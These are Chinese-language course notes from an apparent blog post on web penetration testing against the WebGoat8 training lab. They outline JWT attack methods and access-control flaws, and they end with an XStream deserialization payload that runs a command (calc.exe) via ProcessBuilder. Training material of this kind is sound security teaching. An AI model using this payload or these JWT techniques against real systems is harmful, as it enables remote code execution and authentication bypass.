《渗透测试》WEB攻防-JavaWeb项目&JWT身份攻击&组件安全&访问控制 2022 Day21

1
 

➢ JavaWeb-WebGoat8靶场搭建使用

➢ 安全问题-目录遍历&身份认证-JWT攻击

➢ 安全问题-访问控制&安全组件-第三方组件

 

#环境下载:

https://github.com/WebGoat/WebGoat

 

#目录遍历

 

#身份认证

-键值逻辑:使用键名键值进行对比验证错误

-JWT攻击:1、签名没验证空加密 2、爆破密匙 3、KID利用

https://www.cnblogs.com/vege/p/14468030.html

 

#访问控制

-隐藏属性:前端页面的自慰限制显示

-水平越权:同一级别用户权限的查看

 

#安全组件

-联想到刚爆出的Log4j2

<sorted-set>

<string>foo</string>

<dynamic-proxy>

<interface>java.lang.Comparable</interface>

<handler class="java.beans.EventHandler">

<target class="java.lang.ProcessBuilder">

<command>

<string>calc.exe</string>

</command>

</target>

<action>start</action>

</handler>

</dynamic-proxy>

</sorted-set>

posted @ 2023-03-24 22:47  muqing1  阅读(113)  评论(0)    收藏  举报